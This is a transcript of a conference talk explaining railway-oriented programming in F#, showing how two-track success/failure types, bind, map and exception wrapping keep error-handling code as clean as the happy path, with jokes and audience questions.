I'm going to show you the functional equivalent, which I'm calling railway-oriented programming. I'll show you how to do it in practice, and then various techniques you can do to actually extend it to be quite powerful. So let's start off with a simple use case. So here's my little scenario. As a user, I want to update my name and email address. Okay, so I'm going to assume this is a very, very crude website web service. I'm not going to get hung up on the implementation too much. It's really just a concept. So let's say there's a request, it's got a user ID or a customer ID, and there's a name, and there's an email address, and so on. I need to validate that. Maybe I need to make sure the user ID is not negative, make sure the name is not blank. Maybe canonicalize it, maybe strip out spaces, you know, lowercase the email address, something like that. Then we update the existing user record in the database. And then maybe if the email has changed, we might send out a verification email saying your email has changed from this to this, you know, is it okay, you know, just to make sure that someone else hasn't taken over your account. And then finally, return the result to the user. That's really an extremely simple use case. Can't really get much simpler than that. So how would you write it in something like C#? Well, we have a request, and then we validate the request, and we canonicalize the email, and then we update the database, and we send an email, and then we return success. So the code pretty much matches the use case. By the way, I'm going to show quite a bit of code. I don't want you to actually spend too much time reading the code. I just want to really just go over roughly what the code looks like, you know, so it doesn't really matter, the details of the code. But just to show you, sometimes there'll be more code, sometimes less code, just to give you an idea, just quickly scan it.
You don't have to, like, understand every line. So that's how it looks in C#. Hopefully that would be very familiar. I'm not saying this is the greatest code in the world. You know, you might want to use an async version of the send email or something, but it's good enough for this example. So let's look at the functional equivalent. So this is how you might write the same thing in F#. You have an update customer function. This is a method, you receive a request, you validate the request. You do the almost identical, line for line, pretty much the same thing. Those little double arrows, that's the F# way of composing functions. So basically the output of one function goes into the input of the next function. But other than that, you could understand this is pretty much like the C# code. Right. So that's if everything goes right, but what happens if things go wrong? Okay. So happy path. And we never really think about it enough. This is a great quote. I like it: a program is a spell cast over a computer, turning input into error messages. If we're lucky, things will come out right, but if we're not careful, a lot of the time they come out wrong. So here's a bunch of examples. I don't know if you can see these, but I'll read some of these out to you. This one says invalid unhandled exception. The device is not ready. Okay. You've seen this kind of thing zillions of times. This one says an unhandled exception occurred: invalid user name. This one is a Visual Basic error. Overflow. Very helpful. It says run-time error 6. This one: an exception was unhandled. The developer needs to do his job. This one says you've been warned three times this file does not exist. Now you've made us catch this worthless exception and we're upset. Do not do this again. This one, a classic: keyboard not plugged in, press F1 to retry. Good job. You broke Photosynth.
It wasn't your fault, but Photosynth will crash and burn, perhaps even taking this instance of IE with it. An error has occurred while creating an error report. That's a good one. An error has occurred, but this error message cannot be retrieved due to another error. And this is my favorite one: error, the operation completed successfully. So this is the kind of thing where you'll end up on, you know, one of those websites like The Daily WTF with something stupid. Don't do that. Handle your errors properly. So I think one of the differences between, you might say, a professional programmer and a weekend amateur is how well you handle your errors, really. Okay, that sort of differentiates the grown-ups from the kiddies. So let me go back to this. This is the use case: as a user, I want to update my name and email address and see sensible error messages when something goes wrong. We never put this in our use case. We sort of assume this, we take it for granted, but I'm going to explicitly put it in here because we need to think about it. So let's think of all the things that can go wrong, even in these three steps. Okay, what can go wrong? Well, the first thing is when we try and validate it, we can get a blank name. We can get an email which is not valid. Also, things can go wrong when we update the user record. Maybe the user isn't found in the database. Maybe we get a database connection error. When we try and send an email, we get an authorization error, we get a timeout. Lots and lots of things can go wrong. I haven't even started. I mean, this is just scratching the surface. You can think of hundreds of things that can go wrong. So let's see how our C# code changes as a result of all this error handling. So here's the original code, but then we need to validate the request. So if the request is not valid, we return, you know, request is not valid. And then if the database fails, then we have to say customer record not found.
But then the database might throw an exception. So we have to wrap the whole thing in a try catch block. And then if we send the email, maybe we can't log in properly. So all of a sudden our nice clean C# code that modeled the use case very nicely in the happy path, now it looks really ugly. All right. And basically we went from six clean lines to 18 ugly lines. And that's 200% extra code. Two thirds of the code is error handling and only one third of the code is actually doing something useful. And I'm sure you've all seen code like this. I'm sure your code is full of this kind of stuff. And it's really annoying because it sort of gets in the way of trying to understand what the code's trying to do. The original code without error handling was lovely. I could totally understand what that was doing. Now I'm totally lost about what this code is trying to do. So let's look at the functional equivalent of this code. And the question is, can we preserve the elegance of the original code in the functional version? Let's see how complicated the functional code gets. So here's the original functional code. All right. Very similar to the C# code. And here is the code after error handling. So does that code look familiar? Yes. It's exactly the same code. Now you might think that's impossible. How can it have error handling when the code hasn't changed? And you might not believe me. Hopefully by the end of the talk you will believe me. And I can even demo it. I actually have a little Visual Studio project, so I can actually demo it to you. So that's the point of this talk. So let's look at the difference between error handling in an imperative design and a functional design. So in an imperative design, I have a request handling service like a website. The request comes in and a response comes out. That's the happy path. I pass it through, you know, a validation function and an update method and a send method, and I get the response back.
Now if something goes wrong, in an imperative model, I can return early. So if the validation fails, I just return early. I just never pass it through to the next thing. And if the update database fails, I just return early and I never pass it to the next thing. So that's pretty much what the imperative code looked like. There was try something, if it fails, return; try something else, if it fails, return; if, if, if, fail, fail, fail. So how does the functional design differ? So in the functional model, you don't call a method and get a response. You have a function. A function has an input and an output. So it's like a little black box. And every function has exactly one input and exactly one output. That's sort of the definition of a function. All right. So in this case, we have a function. The whole use case is going to be represented by one single function with an input and output. So in the happy case, the single function is going to consist of smaller functions which are connected together in a pipeline. So the output of the validate goes to the input of the update, and the output of the update goes to the input of the send, and so on and so forth. And the final output is your response. That's fine when everything goes well; what happens when things go badly? So the problem when things go badly is you can't do an early return. That concept does not exist in functional programming. What you have to do is you have to keep going all the way to the end. You cannot pass go. You cannot collect your $200. You always have to go to the end. So that's what a functional model looks like. So there are a couple of questions. How can you bypass these downstream functions? I want to return early, but I can't. How do I do that? And the second question is how can a function have more than one output? I just said a function can only have one output.
And here it looks like I've got four different outputs: one success output and three different error outputs. And that's not possible. Functions can only have one output. So how do I do that? Well, let me answer the second question first. So in a functional design, here's my three failure cases. What you can do is you can create something called a sum type. It's called a discriminated union in F#, or a choice type, as I like to call it. Because it's basically a choice of these four different things. But it's encapsulated into one single value. So it's not four different results. It's one single result with four different choices in it. So you can think of it like an old-style C union type with a tag that tells you which one, except it's type safe, unlike C. Now, that type is very, very specific to this particular use case. So, yeah, sum types are great, by the way. One of the very best things about F# or Haskell or OCaml or languages that have them. Worth switching languages just for that one feature, if you're into it. But that one is a bit specific to this particular use case; is there a more generic one I can use? Let's just have a more generic one. You have a success or a failure. You've got two choices, right? So I've merged all the failure cases into one single failure output. The problem with that is now I have no information about the failure. No information about the success either. So what I do is I modify that bit and I parameterize it by a type. So it's this T entity. So it's some sort of value that is on the success path, like the customer or the product or whatever it is you're trying to do. And in the success path, that's what you get. And on the failure path, you get a string. So you've got a choice of two different things, a successful entity or a failed string. And that's returned as a single value from your function. Does that make sense so far?
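The talk's examples are in F#, where this success/failure type is a discriminated union. Since the speaker says the concepts carry over to other languages, here is a minimal C++ sketch of the same two-track type — the `Result` name, field layout, and `ok`/`fail` helpers are all invented for illustration, not taken from the talk:

```cpp
#include <string>
#include <cassert>

// A minimal two-track type: success carrying a value, or failure carrying a message.
// (In F# this would be a discriminated union; here it's a tagged struct.)
template <typename T>
struct Result {
    bool success;
    T value;            // meaningful only on the success track
    std::string error;  // meaningful only on the failure track

    static Result ok(T v) { return {true, v, std::string()}; }
    static Result fail(std::string msg) { return {false, T{}, msg}; }
};
```

A function that can fail returns one single `Result<T>` value, so it still has exactly one output.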
You can think of this as a little bit like an inheritance with two subclasses. That's another way of thinking about it if you want to do it that way. Right, that's actually not the final design, but that's a good starting point for the rest of the talk. So each use case is a single function. The function returns a sum type with two choices, success and failure. The function is going to be built from a set of smaller functions. And each smaller function is going to represent one step in the data flow. And then you can connect all the smaller functions together. And all the errors are going to be combined into single failure. So that's our functional design for doing our handling. Well, hopefully that sort of makes sense. But the devil is in the details, so let's look at how we're going to do it. How do you actually bypass the downstream functions when you have an error? That's the key thing. How can we actually get that to work? So how do I work with errors in a functional way? Well, as it happens, I have this very clever friend, and he knows everything about functional programming. And next to him, I'm kind of, I feel like I'm kind of stupid. So I asked him, how do I handle errors in a functional way? So I have a series of functions that I want to chain together, and I need to capture errors at the same time. And he said, that's easy, you just need a monad, right? So you probably all heard of monads, but you probably don't know what they mean. And that's how I felt when I first encountered it. So I said, well, what's a monad? And he said, a monad is just a monoid in the category of endofunctors. And you might have heard that too, and that's kind of not very helpful. So I said, well, you know, and he said, what's the problem? And I said, I don't know what an endofunctor is, and he said, well, it's easy. A functor is just a homomorphism between categories, and so an endofunctor is just a functor that maps a category to itself. 
And that's the kind of thing when you talk to smart people, this is the kind of stuff they tell you. Okay? Simple, he said. And I said, yeah, right, of course, I understand, but seriously, seriously, what do I have to do? So he said, okay, well, you don't really need to know everything about monads, you just maybe need to use maybe. And I said, maybe what? And he said, maybe the monad. And I said, maybe the monad what? Maybe is the name of the monad. And I said, don't you mean maybe the name of the monad is? And he said, no, you're talking like Yoda. Maybe the name of the monad is. And I said, no, no, you're talking like Yoda, you are. So he said, yeah, okay, maybe is definitely what you want. So I said, definitely maybe. And he said, actually, I prefer What's the Story Morning Glory. So yeah, whatever that is. And then he changes his mind and says, okay, actually either might be better. And I said, either what? And he said, either the monad, and I said, either the monad or what? And he said, either, that's all. And I said, just either. And he said, no, just is part of maybe. So if you're a Haskell person, you'll understand what I'm talking about. And I said, just maybe. And he said, no, you have to say just something or just nothing. And I said, just nothing. But a minute ago, you said, definitely maybe. And he said, well, now I'm talking about either. And I said, either, just nothing or definitely maybe, which one is it? Make up your mind. And he said, neither, just use either. And that's sort of when my head exploded. So I don't know if you've ever had a conversation with, you know, people who are experts, maybe academic people in functional programming. I think if you understand all this stuff, it's very easy to talk like that. And I want to try and present a way which is a little bit easier to understand than that. Really, monads are actually not that confusing. They have this reputation for being confusing.
If you actually read the original paper by Phil Wadler, it's actually not that bad. A little bit scary if you don't like math, but it's actually very, very readable. Just skip over the math bit and focus on the text and it should make perfect sense. So instead of monads, I'm going to talk about railway-oriented programming. It's got nothing to do with monads. So let's go back to the definition of a function again. So I like the analogy that a function is like a bit of railway track. And on this railway track, there is the tunnel of transformation. And that turns things from one thing into another. When they go through this tunnel, they get transformed into a different kind of thing. So in this case, maybe I have an apple going into this tunnel of transformation and it comes out as a banana. So this function takes apples to bananas. It turns apples into bananas. So you write it in F#, and in Haskell as well, as apple, little arrow, banana. So it takes an apple as input and it outputs a banana as output. Does that make sense? Pretty straightforward. So what happens when you have two of these functions? So here is a function that turns an apple into a banana. And here's another function that happens to turn a banana into a cherry. So how do I connect them together? So in functional programming, what's very nice is you can compose them together. And you basically glue them together. And it's pretty obvious how you glue them together. You just stick them together like that. You take the output of one and you stick it at the input of the other. That's called composition. And when you do that, you get a new function. And this function turns apples into cherries. The banana is kind of hidden inside. In fact, what's really great about this is you cannot tell that this new function was built from smaller functions.
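The apple-to-banana-to-cherry gluing can be sketched as a generic `compose` helper. This is a C++ illustration of the idea, not the talk's F# `>>` operator; the `int`-doubling and `+1` lambdas are arbitrary stand-ins for the fruit transformations:

```cpp
#include <cassert>

// compose glues f (apple -> banana) and g (banana -> cherry)
// into a single new function (apple -> cherry).
template <typename F, typename G>
auto compose(F f, G g) {
    return [=](auto x) { return g(f(x)); };  // the "banana" is hidden inside
}
```

The result of `compose` is just another function; a caller cannot tell it was built from two smaller ones.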
And that's one of the great powers of functional programming: you get this composition model where the tiny things are functions, but you glue them together and you get this giant big function. And it's the same thing. You literally cannot tell how it was built. And it's the same logic. It's the same model all the way from the bottom to the top. All right. So that's with a single input and a single output. So in this situation, we have an error. So here we have, let's say, a validation function, and it gets an input. It gets a request as an input, but it has a success branch and a failure branch. So how could we model that using this railway analogy? Any ideas? Branch line. Branch line, yes. So I'm going to show you just a little bit of code here. So if the name is blank, it returns a failure case. If the email is blank, a failure case. Otherwise, it's a success. So that's an example of real F# code that generates a failure and a success. All right. The way we model it is one of these things. Okay. Now I'm going to call them switches, which is the U.S. terminology. UK, British English calls them points. I don't know what they say in Norway, but I use American terminology just because I think switch is actually a better word from a functional programming point of view for what these things do. So we have a switch, and it has an input, and it has two outputs. Now, like I said, it's not really two outputs. It's one structure with two cases, but I'm going to call them two outputs, basically. So you've got a success case in green and a failure case in red. So how do you glue these together? So let's say we have the validate function, and it's got this kind of split, and we have an update database function, and it's got a split. And I want to glue them together in a line. So what we have to do is if the validate function is successful, we want the output of that one to go to the input of the update.
But if the validate is a failure, we want to bypass it and go all the way to the end. So I think it's pretty obvious that the way you connect them is like that. I think hopefully it's really obvious this is the right way to connect these two things together. What happens when we have three different functions? So here we have our validate and our update and our send email. And I want to glue them all together. And when I do that, I end up with this. So this is what I call a two-track model. All right? So instead of having one track, you have two tracks. You have a success track and a failure track. And the data comes in, and when something goes wrong, it gets shunted onto the failure track, and the failure track keeps going to the end of the function. So hopefully that's pretty straightforward. I think it's kind of quite easy to understand. So how do you actually do this in practice? So let's just step back a bit. So we have our two-track system and we have these two-track tunnels. So these steps in our process are now these tunnels. They cross both tracks now. It's not just a single tunnel of transformation. The tunnel is now quite wide, and it covers both tracks. But if you look inside the tunnels, you can see that inside each one is actually a little switch. So gluing them together. So I talked about how it's quite easy to glue together. If you've got one coming in and one coming out, you can glue them together. It's really easy. It's also easy to glue them together if you have two things going in and two things coming out, because you just connect the two things together, just like some sort of plug and socket. But we don't have two things coming in. We have one thing going in and two things coming out. So how do we connect them? They just won't connect properly. So what we want to do is take our one-track input, two-track output thing, our switch, and we want to turn it into something which has two-track input and two-track output.
If you can turn it into those things, then we can glue them together really nicely. So how do we convert from the first case to the second case? Well, what we do is we have a little adapter block. So this is a little thing, and it has a two-track input and a two-track output, but it's got a little slot in the top that we feed our switch into, and it magically sorts it for us. So we pass in one of these switches, and we get out one of these two-track things. So it's literally the adapter pattern, if you want to think about it from OO. I'm converting something that doesn't fit into something that does fit. So let's see how that works. We have this two-track input. So we're actually going to define the function. I'm going to define the function for you. So literally a four-line function like this. So we pass in a switch function, and we output a new function, and it has a two-track input, and on the success case, we call the switch function. All right? And if it's the failure case, we just go straight out as a failure. So failure in, failure out. We call the switch function. The switch function could be a success or failure, depending on how it actually works. So that's exactly how you write this adapter function. Now, this adapter function is actually called bind in functional languages. I don't know the reasons why it might be called bind, but if you see a function called bind in a functional language, this is exactly what it's doing. And I'll just show you the type signature. In functional languages, type signatures are really important, and they actually tell you everything you need to know about the function normally, so you don't really need to know what the name is. If it has that type signature, you know what kind of function it is. So this particular function has three parts. The first part is something that takes an apple to a banana, right? But it takes it from a one-track apple to a two-track banana. Right?
So that's our switch function. That's the functional way of doing generics. So in C sharp, you might call it a T and a U and a V, or something like that. So in functional programming, you use ABC for generics. So it's apple, banana, cherry. So it takes an apple to a banana, and as a result of that, the output is a new function, and the new function takes a two-track apple and turns it into a two-track banana. So that's the bind function. This is one of the most important functions in functional programming. You can actually write the same function with two parameters. This one has one parameter, a switch function. This one has two parameters, a two-track function. It's exactly the same function. One of the weird things you can do in functional programming is have a one-parameter function and a two-parameter function that's the same function. And that's called currying, and I have an interesting post about that if you want to read it, but you don't really need to understand that for this talk. All right, so let's look at some real examples. We have our name-not-blank validation function. If the name is blank, it returns a failure. If the name is not blank, it returns success. Let's say it has to be less than 50 characters long, so if it's longer than 50, you return a failure. Otherwise, it's a success. If the email is blank, it's a failure. Otherwise, it's a success. So there's our three little switches, and we want to glue them together. So what we do is, first of all, for each one, we put a bind in front of it, and that converts each one of those little functions into these two-track functions. And then once we have the two-track functions, we can glue them together with composition. Does that all make sense to you? All right. And what's cool about this is we now have a new function called validate request, say, that has those three different validation steps in it, but it looks like one big two-track function.
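To make that concrete, here is a rough Python sketch of the bind adapter and the three validation switches just described. The talk's actual code is F#; the `Success`/`Failure` classes and all the names below are my own illustrative stand-ins, not the speaker's code.

```python
from dataclasses import dataclass

# Two-track result: one structure with two cases.
@dataclass
class Success:
    value: object

@dataclass
class Failure:
    error: str

def bind(switch_fn):
    """Adapt a one-track-in / two-track-out switch into a two-track function."""
    def two_track(result):
        if isinstance(result, Success):
            return switch_fn(result.value)  # may come out Success or Failure
        return result                       # failure in, failure out: bypass
    return two_track

# Three small switches: one-track input, two-track output.
def name_not_blank(req):
    return Success(req) if req["name"] else Failure("Name must not be blank")

def name_max_50(req):
    return Success(req) if len(req["name"]) <= 50 else Failure("Name must be 50 characters or less")

def email_not_blank(req):
    return Success(req) if req["email"] else Failure("Email must not be blank")

def compose(f, g):
    """Ordinary function composition: the glue for two-track functions."""
    return lambda x: g(f(x))

# Put a bind in front of each switch, then glue with composition.
validate_request = compose(compose(bind(name_not_blank), bind(name_max_50)),
                           bind(email_not_blank))
```

Calling `validate_request(Success(request))` runs all three checks in sequence; the first failure shunts the data onto the failure track and bypasses the rest, exactly like the railway diagram.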
It's like now one big tunnel, rather than three small tunnels, it's one big tunnel. So I now have a new function that's a two-track function input, and it takes a two-track input and a two-track output. Again, I cannot tell that it was composed of smaller functions, which is kind of cool. And as you can see, it's pretty obvious that now I just build up my bigger functions, my big two-track functions, and my small two-track functions, just the same way that I built my one-track functions by gluing them together. I can build my two-track functions by gluing them together, but I have to use the bind to do that. Sometimes you'll see this symbol for bind, and it's double-arrow followed by an equal sign, and so the code might look a bit like that. I'm not going to use that, actually. I'm going to try and stick with the word bind, just so you know what I'm talking about. But this is one of those things where you see some strange symbols in functional programming, and you think, oh, it's full of all sorts of weird symbols. There aren't actually that many weird symbols. There's maybe five or six things that kind of crop up over and over, and this is one of them. You see this is just another word for bind, it's an infix version of bind. Right. Just to point out that this bind thing has got nothing to do with how the things get transformed. It's about the shape. So if we take an apple input in the outputs of banana and a banana input in the outputs of cherry, the whole thing takes an apple and outputs a cherry. Now, if I try and pass in the wrong kind of thing, I can't connect up, you know, if I'm trying to, if something takes a pineapple instead of a banana or something, they won't, I still can't connect them because the types won't match. So it's still type safe, but it's all about the shape, not the types themselves. So here's my generic two track thing, same as the example I showed originally. So in this case, the t entity is an apple. 
In the second case, the t entity is a banana. In the third case, the t entity is a cherry. So it's a generic type, just like a list of t entity or, you know, an IRepository or an IDisposable, you know, the various things that take generics in .NET. All right, so let's review what we've got. We started off with these switches and we turned them into two-track functions using bind, and then we glued them together with composition and we now have a new function. All right, time for a joke, because that's kind of boring. This is a kind of boring, I mean, I'm not saying this is an exciting talk, I think it's interesting, but I wouldn't say it's exciting, so here's a bit of joke for you. What do you call a train that eats toffee? I don't know, what do you call the train that eats toffee? You call it a choo choo train. Right, okay, that's for all the seven-year-olds in the audience. Some of you might be eight-year-olds, so you might not find that funny anyway. All right, so let's see what we can do with this. We can take this out for a spin and work with other kinds of functions, because that's not the only kind of function we have to deal with. That was, you know, a very, very simple model. So let's, real life is always more complicated than that. Let's see if we can fit real life into this. So the first kind of thing we should deal with is single track functions. So we talked about these switch functions, like validation, where there could be an input, a success and a failure. What happens if it's always going to be a success? If you can guarantee it's going to be a success. How does that fit into this model? What happens if you have a dead-end function, like you put something in a database and nothing comes out? It's just, you know, just vanishes, gets sucked into nothing. How do you handle that? What about functions that throw exceptions, right, because if you're dealing with .NET code, it may well do that.
And what about, you know, what I'm calling supervise functions, like logging, monitoring, event handling, that kind of stuff. So we'll start with single track functions. So here's an example of a single track function, canonicalized email. Okay, so we're going to trim the email and we're going to lowercase it. All right, now that function can't go wrong. Assuming the input's not blank, because we know it's not blank, because we validated it before. So I'm going to assume the input's not blank. And hopefully it won't throw an exception. If it throws an exception like out of memory or something, then there's nothing we can do about that. But it's not going to throw an IO exception or anything. So that's a one-track function. But that doesn't fit into our model, right? We can't glue a one-track function in between these two-track functions. So what do we do? Well, we have to turn it into a two-track function, right? That's kind of obvious. So if we turn it into a two-track function, we have one of these adapter blocks. So in the previous case, the adapter block had a switch in it. This adapter block just has a single slot for a one-track function. So the failure track is never used. So how do we turn a one-track function into a two-track function? There it is. It goes in like that and it comes out like that. So the function that does that in functional programming is called map. Well, sometimes it's called lift. So it turns a one-track function into a two-track function. And it's very simple. Again, if you have a successful input, you run that function on the success, and then you put that on the success branch. And if you have a failure as input, you just return the failure. And it has this type signature. Slightly different. The first one with bind, it took an apple and it returned a two-track banana. In this one, it's an apple and it takes something, some type like an apple, and returns a different type like a banana. 
And it turns it into a two-track apple going to a two-track banana. But there's no error handling. The first parameter doesn't have any errors. So it's just straightforward mapping from one thing to another thing. All right? So I say, don't worry about this code. I'm not expecting you to understand this code. It's just showing you that it's actually just literally a few lines of code. Hopefully, I'll put the slides up. You can go through them at your leisure. And you can actually write map in terms of bind. So it's kind of one of the cool things about functional programming. You can build even functions like map. You can build it from smaller functions. So that's how you build it from bind. Right. So now we've turned our one-track into a two-track and we can glue it together. That's great. What about dead-end functions? So a dead-end function is something like updating a database. You have some sort of customer. You update the database. Nothing comes back. It's like a void. All right? Now, in functional programming, you actually can't have void. Every function has to return something. In functional programming, that's called a unit. So it returns a unit, but it's still pretty useless. It's not a lot you can do with it. So again, it doesn't fit into our two-track model. We need another adapter function. So what we're going to do is we're going to turn our dead-end function into a single-track function. All right? So it has a one-track input and a one-track output. And I'm going to just call it tee, for lack of a better word. There's not really a consistent name for these kinds of things. But again, you can see that you can slot in my dead-end function, and what it does is take the same input and just pass it on as the output. Now, once I have my one-track function, I can then use map to turn my one-track function into a two-track function, just like I showed you before. So my dead-end function can be slotted into this model as well. All right?
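Here is the same kind of Python sketch for the two adapters just described: map (lift a one-track function) and the tee-style dead-end wrapper. Again these are illustrative stand-ins for the F# shown in the talk; the example canonicalize and database steps are mine.

```python
from dataclasses import dataclass

@dataclass
class Success:
    value: object

@dataclass
class Failure:
    error: str

def map_adapter(one_track_fn):
    """Lift a one-track function (which can't fail) into a two-track function."""
    def two_track(result):
        if isinstance(result, Success):
            return Success(one_track_fn(result.value))
        return result  # failure just passes through
    return two_track

def tee(dead_end_fn):
    """Turn a dead-end (void) function into a one-track pass-through."""
    def one_track(x):
        dead_end_fn(x)  # side effect only; its output is ignored
        return x        # pass the original input along
    return one_track

# Example one-track step: trim and lowercase the email.
def canonicalize_email(req):
    return {**req, "email": req["email"].strip().lower()}

# Example dead-end step: a stand-in for a real database write.
saved = []
def update_database(req):
    saved.append(req)

canonicalize_step = map_adapter(canonicalize_email)
db_step = map_adapter(tee(update_database))  # dead-end -> one-track -> two-track
```

So the dead-end function is wrapped twice: tee makes it one-track, then map makes it two-track, and it slots into the same pipeline as everything else.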
Let's look at functions that throw exceptions. So I'm specifically thinking of anything to do with IO. That's where you get file exceptions, web exceptions, database exceptions. You call something and it says, oh, yeah, I return a file. It's like, no, you don't. Sometimes you return a file, but sometimes you throw an exception. So what we do here is we have what looks like a one-track input. Let's say you're sending an email to an SMTP server. It looks like it's a one-track function, but it's not really, because it could throw exceptions. So what you want to do is catch all the possible exceptions it could throw, right? And you basically wrap it in a try-catch, right? And now what you've done is you've turned something that throws exceptions into something which is a switch function. So any possible error that could happen in that function is now put on the failure path. So once you've turned it that way, you don't have to worry about exceptions in your code anymore. You just wrap your IO stuff with these exception handling things. So now send email looks like that. Once it looks like that, you can glue it together with all the other ones. And like I say, I wouldn't worry about things like out-of-memory exceptions. I would worry about file-not-found exceptions, argument null exceptions, all the weird exceptions, the web timeouts. So it's a very important guideline in functional programming. You don't really use exceptions in functional programming as an error-handling mechanism. OCaml does a little bit, but it's generally considered bad form. You basically want to turn things into errors, especially this two-track error model, and then you can handle it nicely. You can see exactly what's going on. It's not just me who says this. Yoda says this too. You probably didn't think that Yoda had an opinion about programming models, but in fact he does, because remember he said, do or do not, there's no try. So, yeah. All right. So yeah, don't use try.
If you're using try-catch in your code, you're doing something wrong. Now you can use try-catch at the very low level when you're dealing with IO, but once you've done that, it should not bubble up. You never have to handle exceptions higher up. And finally, we have supervisory functions, like, I say, tracing, logging, things like that. And here we go. The same model. Let's say we want to log everything that happens on the success, or maybe we want to log everything that happens on a failure. So we just want to insert that into our stream. Well, we just have an adapter block, and it takes two functions, one that you do on a success and one that you do on a failure. So that's really straightforward. So, putting it all together, we have our validate function, which takes an input. We have a canonicalize. We have an update database. We have our send email. Oh, something we've forgotten is how do we actually get the output of this thing? So we've got this two-track model, but your browser doesn't understand two-track types. Your browser deals with strings. So what we need to do is take both tracks and merge them together into something that your browser can handle. So here's an example of return. So let's say it's a success. You return an OK, and you turn the object to JSON or something, or XML, whatever. On the other hand, if it's a failure, you might return a bad request, say, or an invalid server operation or something. And exactly which one you return, I'm actually going to show you. You can choose in more detail exactly which one to return. But if you look at this workflow, you can see that there are no early returns, and all the error handling is done at the very end. The final conversion is done at the very last step, the return step. Which makes these things really, really easy to test. So if I just want to test the validation logic, if I just want to test the send email logic, I can do that. Each one of these things is completely isolated.
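Putting those pieces together, here is a Python sketch of the whole two-track workflow described above: a try-catch adapter for the exception-throwing send-email step, plus a final merge of both tracks back into a single response. The talk's code is F#; every name below (including `pipe`, `try_catch`, `either`, and the fake SMTP failure) is my own illustration.

```python
from dataclasses import dataclass

@dataclass
class Success:
    value: object

@dataclass
class Failure:
    error: str

def bind(switch):
    return lambda r: switch(r.value) if isinstance(r, Success) else r

def map_adapter(fn):
    return lambda r: Success(fn(r.value)) if isinstance(r, Success) else r

def try_catch(fn):
    """Wrap an exception-throwing function so every error lands on the failure track."""
    def switch(x):
        try:
            return Success(fn(x))
        except Exception as exc:
            return Failure(str(exc))
    return switch

def either(on_success, on_failure):
    """Merge the two tracks into one value, e.g. an HTTP-style response."""
    return lambda r: on_success(r.value) if isinstance(r, Success) else on_failure(r.error)

def pipe(*fns):
    """Left-to-right composition: validate, canonicalize, send, return."""
    def run(x):
        for f in fns:
            x = f(x)
        return x
    return run

def validate(req):
    return Success(req) if req.get("email") else Failure("Email must not be blank")

def canonicalize(req):
    return {**req, "email": req["email"].strip().lower()}

def send_email(req):
    if "@" not in req["email"]:
        raise RuntimeError("SMTP rejected address")  # stand-in for an IO failure
    return req

handle = pipe(
    bind(validate),
    map_adapter(canonicalize),
    bind(try_catch(send_email)),
    either(lambda v: ("200 OK", v), lambda e: ("400 Bad Request", e)),
)
```

Note there are no early returns anywhere: a validation failure and an SMTP exception both ride the failure track to the single `either` at the end.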
So it's a really useful framework, and I think it really pretty much covers most cases. I mean, there's some cases it doesn't handle, but I think for most things I would recommend using this model. So let's look at the code we had before and after error handling. Remember I said I want to see what we can do, what it would look like. So that was the code before. Receive a request, you take the output of that, you pipe it into validate request, you take the output of that, you pipe it into update and so on. And here's the code afterwards. Now I promised that they would look the same. And I think that you can see they really are, because if you look at the flow, the two-track model is exactly the same. Receive, validate, update, send, return. So the code looks the same, but what's being passed around are two-track things rather than one-track things. Make sense? Yeah? Still clean and elegant, that's what I like about it. Time for another joke. You're laughing already, I haven't even said the joke. Okay, why can't the steam locomotive sit down? I don't know, because it has a tender behind. Right, I'm going to talk about some more stuff. Any questions so far? Making sense? Hopefully, yeah? So this entire thing is predicated on the fact that you're not really concerned about what functions are doing. You have this set of functions that take those things and convert them into something else that you can then compose and handle errors while you go along. Yes, so the question is, the whole thing is predicated on the fact that you can have a generic way of composing functions that don't really care what's actually going on. It's about the shape of the functions being glued together, absolutely. This is a completely generic error-handling technique. So it's a uniquely functional way of looking at it? Yes, well actually all you need is choice types or discriminated unions. So if you actually have what they call the Either monad in Haskell, you can do this.
So you can do this in C sharp, it's painful, but you can do it. It's a lot easier if the language supports it: if you can do it in four lines of code, it's a lot easier than doing it in 100 lines of code. Yeah. So the question is, what happens if I have a divide by zero? Well, the divide by zero would be a step called divide by zero. That's a one-track function that throws an exception, so we'd have to wrap that before we bind it. Yeah, well, it depends on what you think is a pain in the ass. I think I would have a function called divide two numbers, and it's a two-track function: it returns a success or a failure. And I can then reuse that function over and over. I don't have to write that function more than once. Yeah, but you've got to change all the code that's got divide in it. Yes, but all your, well, okay. So the question is, do you have to change all your code that has these divisions everywhere, do you have to change it? The answer is yes. If you want to have safe error handling, everywhere that you do a divide that is not wrapped in an exception handler, you have to wrap it in an exception handler. Yes. Which you have to do either globally — well, you don't have to, you could wrap it globally. I'm not saying this is good — if you're doing things like matrix multiplication or something, I wouldn't necessarily recommend this as the best method. But for sort of business cases, these are reusable functions, you know, so once I've got a generic exception handler wrapped around divide, I pass that through all the way, absolutely. So yeah, it doesn't help if you've got legacy code that doesn't do that, it's painful. Now, Erlang of course, you just crash and carry on, but this is not Erlang, so.
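The reusable divide function mentioned in that answer might look like this in the same Python sketch style (the two-track `Success`/`Failure` types and the name `divide` are illustrative assumptions, not from the talk):

```python
from dataclasses import dataclass

@dataclass
class Success:
    value: object

@dataclass
class Failure:
    error: str

def divide(pair):
    """A reusable switch: division with the failure case made explicit,
    so no exception ever escapes. Write it once, bind it everywhere."""
    x, y = pair
    if y == 0:
        return Failure("divide by zero")
    return Success(x / y)
```

Because `divide` is a switch (one-track in, two-track out), it can be glued into any pipeline with the same bind adapter as the validation steps.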
What happens if the entire machine the computation is running on crashes? Yes, so this is good for systems where you don't want that, where it's bad if your system crashes. So the point is, you know, in Erlang, you just crash and carry on. In .NET, you don't really want to throw unhandled exceptions, it's not a good model. So yes, one answer is don't use .NET, but if you are using .NET, this is probably what you want to be using. Right, okay, so let's extend the framework and see what we've got. So I'm going to talk about designing for errors. So if you're going to use this model, there's a way you should design for errors. Designing for errors actually becomes part of your requirements. I'll talk about how to do stuff in parallel, and I'll talk about domain events. So let's talk about error handling. So the first point I want to make here is that errors are actually requirements. Okay, the unhappy paths are requirements too. Don't ignore them just because you cross your fingers and hope they never happen. That's not very good design. All right, so let's look at how you can turn this model into something where you actually design the errors in, rather than them just being an accidental afterthought. So let's say we're validating our input and we have our failures here. And here's our two-track type. First problem is that using strings is a terrible idea. All right, strings are just awful. They don't really tell you information. They're very locale-specific. I can't translate this into Norwegian very easily. It's just not a very good model. Strings are not a good way of designing things. So what I really want to do is use an enum. Right, so I have a set of constants, as you might say, and each possible error is represented by an enum. And in F sharp, that's actually a choice type.
